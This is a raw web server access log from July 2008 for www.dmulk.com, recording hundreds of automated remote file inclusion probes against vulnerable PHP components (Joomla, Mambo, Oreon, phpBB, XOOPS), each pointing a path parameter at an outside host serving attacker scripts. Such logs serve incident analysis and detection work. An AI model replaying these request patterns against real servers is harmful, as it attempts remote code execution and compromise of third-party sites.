218.50.53.168 - - [06/Jul/2008:10:26:12 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.50.53.168 - - [06/Jul/2008:10:26:12 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:26:19 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:26:19 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:26:19 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.93.48.162 - - [06/Jul/2008:10:26:24 -0700] "GET /logs/access_080105.log/index.php?incl=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [06/Jul/2008:10:26:24 -0700] "GET /logs/access_080105.log/index.php?incl=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
207.178.128.116 - - [06/Jul/2008:10:26:28 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://middlestreet.org.uk/Timeline/.log/n??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.178.128.116 - - [06/Jul/2008:10:26:29 -0700] "GET /logs/access_080329.log//index.php?option=com_custompages&cpage=http://middlestreet.org.uk/Timeline/.log/n??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.178.128.116 - - [06/Jul/2008:10:26:30 -0700] "GET //index.php?option=com_custompages&cpage=http://middlestreet.org.uk/Timeline/.log/n??? HTTP/1.1" 200 18479 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [06/Jul/2008:10:26:53 -0700] "GET /logs///com_cropimage/admin.cropcanvas.php?cropimagedir=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [06/Jul/2008:10:26:53 -0700] "GET ///com_cropimage/admin.cropcanvas.php?cropimagedir=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:26:54 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:26:54 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:26:55 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:10:27:04 -0700] "GET //components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:10:27:04 -0700] "GET //components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.7.208.173 - - [06/Jul/2008:10:27:43 -0700] "GET /logs/access_080215.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.duvenbeck.de/contenido/logs/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.15.120.73 - - [06/Jul/2008:10:27:44 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
204.15.120.73 - - [06/Jul/2008:10:27:44 -0700] "GET /errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
87.106.101.24 - - [06/Jul/2008:10:27:45 -0700] "GET /logs//index.php4?lang=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [06/Jul/2008:10:27:45 -0700] "GET //index.php4?lang=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.3.74.226 - - [06/Jul/2008:10:28:19 -0700] "GET /logs/access_080120.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
81.16.50.217 - - [06/Jul/2008:10:28:22 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.duvenbeck.de/contenido/logs/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:10:28:26 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.178.228.12 - - [06/Jul/2008:10:28:27 -0700] "GET /logs/access_080220.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.neilhosker.net//myrid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.178.228.12 - - [06/Jul/2008:10:28:28 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.neilhosker.net//myrid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.178.228.12 - - [06/Jul/2008:10:28:28 -0700] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.neilhosker.net//myrid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:10:28:36 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:10:28:36 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.22.112 - - [06/Jul/2008:10:28:38 -0700] "GET /logs/access_071225.log HTTP/1.0" 200 195051 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
195.168.33.226 - - [06/Jul/2008:10:28:43 -0700] "GET /logs///com_cropimage/admin.cropcanvas.php?cropimagedir=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.168.33.226 - - [06/Jul/2008:10:28:44 -0700] "GET ///com_cropimage/admin.cropcanvas.php?cropimagedir=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.16.50.217 - - [06/Jul/2008:10:28:46 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.duvenbeck.de/contenido/logs/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.63.2.169 - - [06/Jul/2008:10:28:48 -0700] "GET /logs/access_080225.log//header.php?tpl_pgb_moddir=http://www.fo-saverne.com/images/temp/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.63.2.169 - - [06/Jul/2008:10:28:48 -0700] "GET /logs/access_080207.log//header.php?tpl_pgb_moddir=http://www.fo-saverne.com/images/temp/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.63.2.169 - - [06/Jul/2008:10:28:48 -0700] "GET /logs//header.php?tpl_pgb_moddir=http://www.fo-saverne.com/images/temp/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.63.2.169 - - [06/Jul/2008:10:28:48 -0700] "GET //header.php?tpl_pgb_moddir=http://www.fo-saverne.com/images/temp/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
201.3.74.226 - - [06/Jul/2008:10:28:58 -0700] "GET /logs/access_080329.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.16.26.124 - - [06/Jul/2008:10:29:02 -0700] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.neilhosker.net/myrid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
217.16.26.124 - - [06/Jul/2008:10:29:02 -0700] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.neilhosker.net/myrid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
201.3.74.226 - - [06/Jul/2008:10:29:06 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.160.184.74 - - [06/Jul/2008:10:29:12 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.160.184.74 - - [06/Jul/2008:10:29:12 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
201.3.74.226 - - [06/Jul/2008:10:29:12 -0700] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.16.26.124 - - [06/Jul/2008:10:29:21 -0700] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.neilhosker.net/myrid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
217.16.26.124 - - [06/Jul/2008:10:29:21 -0700] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.neilhosker.net/myrid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:10:29:22 -0700] "GET //appserv/main.php?appserv_root=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.7.208.173 - - [06/Jul/2008:10:29:26 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.duvenbeck.de/contenido/logs/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.208.173 - - [06/Jul/2008:10:29:27 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.duvenbeck.de/contenido/logs/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.16.50.217 - - [06/Jul/2008:10:29:30 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.duvenbeck.de/contenido/logs/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.16.50.217 - - [06/Jul/2008:10:29:32 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.duvenbeck.de/contenido/logs/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.16.50.217 - - [06/Jul/2008:10:29:32 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.duvenbeck.de/contenido/logs/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.135.183.134 - - [06/Jul/2008:10:29:34 -0700] "GET /logs/access_071225.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.0" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.135.183.134 - - [06/Jul/2008:10:29:34 -0700] "GET /logs/access_071225.log/errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.0" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.135.183.134 - - [06/Jul/2008:10:29:35 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.0" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
84.19.182.247 - - [06/Jul/2008:10:29:35 -0700] "GET //includes?vwar_root=http://www.riksterwebergroep.nl/site/contentimage/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
84.19.182.247 - - [06/Jul/2008:10:29:35 -0700] "GET /logs//includes?vwar_root=http://www.riksterwebergroep.nl/site/contentimage/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
195.135.183.134 - - [06/Jul/2008:10:29:35 -0700] "GET /errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.0" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.135.183.134 - - [06/Jul/2008:10:29:35 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.0" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.135.183.134 - - [06/Jul/2008:10:29:36 -0700] "GET /logs/errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.0" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
62.75.152.96 - - [06/Jul/2008:10:29:37 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.fsv-neuberg.de/cms/mambots/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.152.96 - - [06/Jul/2008:10:29:38 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.fsv-neuberg.de/cms/mambots/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.116.7.83 - - [06/Jul/2008:10:29:39 -0700] "GET /logs/access_080313.log///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://nkdb.org//AsaMall/makeup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.116.7.83 - - [06/Jul/2008:10:29:40 -0700] "GET ///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://nkdb.org//AsaMall/makeup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.116.7.83 - - [06/Jul/2008:10:29:40 -0700] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://nkdb.org//AsaMall/makeup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.168.33.226 - - [06/Jul/2008:10:29:43 -0700] "GET /logs///phpsecurityadmin/include/logout.php?PSA_PATH=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.168.33.226 - - [06/Jul/2008:10:29:43 -0700] "GET ///phpsecurityadmin/include/logout.php?PSA_PATH=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.178.228.12 - - [06/Jul/2008:10:29:43 -0700] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.neilhosker.net/myrid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
193.178.228.12 - - [06/Jul/2008:10:29:43 -0700] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.neilhosker.net/myrid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
193.178.228.12 - - [06/Jul/2008:10:29:45 -0700] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.neilhosker.net/myrid.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
193.178.228.12 - - [06/Jul/2008:10:29:45 -0700] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.neilhosker.net/myrid.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
202.181.105.117 - - [06/Jul/2008:10:29:47 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [06/Jul/2008:10:29:47 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [06/Jul/2008:10:29:47 -0700] "GET /logs/access_080312.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.215 - - [06/Jul/2008:10:29:57 -0700] "GET /logs/access.log/index.php?configFile=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.215 - - [06/Jul/2008:10:30:02 -0700] "GET /index.php?configFile=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 200 18499 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.215 - - [06/Jul/2008:10:30:02 -0700] "GET /logs/index.php?configFile=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.215 - - [06/Jul/2008:10:30:02 -0700] "GET /logs/index.php?configFile=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.104.188.3 - - [06/Jul/2008:10:30:06 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.215 - - [06/Jul/2008:10:30:06 -0700] "GET /index.php?configFile=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 200 18499 "-" "libwww-perl/5.65" "www.dmulk.com"
218.104.188.3 - - [06/Jul/2008:10:30:06 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.104.188.3 - - [06/Jul/2008:10:30:06 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.250.234.226 - - [06/Jul/2008:10:30:09 -0700] "GET /logs/access_080207.log/modules/My_eGallery/index.php?basepath=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.193.201.57 - - [06/Jul/2008:10:30:13 -0700] "GET /logs//index.php4?lang=http://www.geocities.com/ojolah/find.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
216.193.201.57 - - [06/Jul/2008:10:30:14 -0700] "GET //index.php4?lang=http://www.geocities.com/ojolah/find.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
69.64.94.74 - - [06/Jul/2008:10:30:18 -0700] "GET /logs/access_080315.log/index.php?option=http://l1nuxgroup.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.208.173 - - [06/Jul/2008:10:30:24 -0700] "GET /logs/access_080215.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.duvenbeck.de/contenido/logs/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.213.245.215 - - [06/Jul/2008:10:31:14 -0700] "GET /logs/access_080213.log/index.php?configFile=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.250.234.226 - - [06/Jul/2008:10:31:35 -0700] "GET /logs/access_080329.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
201.3.74.226 - - [06/Jul/2008:10:31:36 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
218.104.188.3 - - [06/Jul/2008:10:31:40 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.104.188.3 - - [06/Jul/2008:10:31:41 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.104.188.3 - - [06/Jul/2008:10:31:42 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.164.225.11 - - [06/Jul/2008:10:32:02 -0700] "GET /logs/access_080320.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
58.227.193.215 - - [06/Jul/2008:10:32:05 -0700] "GET /logs/access_080121.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.193.215 - - [06/Jul/2008:10:32:06 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.193.215 - - [06/Jul/2008:10:32:17 -0700] "GET /logs/access_080121.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.193.215 - - [06/Jul/2008:10:32:18 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.135.183.134 - - [06/Jul/2008:10:32:18 -0700] "GET /logs/access_080118.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.0" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.135.183.134 - - [06/Jul/2008:10:32:18 -0700] "GET /logs/access_080118.log/errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.0" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:10:32:27 -0700] "GET /logs/access_080117.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:10:32:28 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:10:32:28 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.141.56.116 - - [06/Jul/2008:10:32:29 -0700] "GET /logs/access_071225.log//includes?vwar_root=http://john-moeller.de/agow/files/rfi-response.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.116 - - [06/Jul/2008:10:32:30 -0700] "GET //includes?vwar_root=http://john-moeller.de/agow/files/rfi-response.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.116 - - [06/Jul/2008:10:32:30 -0700] "GET /logs//includes?vwar_root=http://john-moeller.de/agow/files/rfi-response.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:10:32:32 -0700] "GET /logs/access_080117.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.csccog.org/mambots/system/.bash/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:10:32:32 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.csccog.org/mambots/system/.bash/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
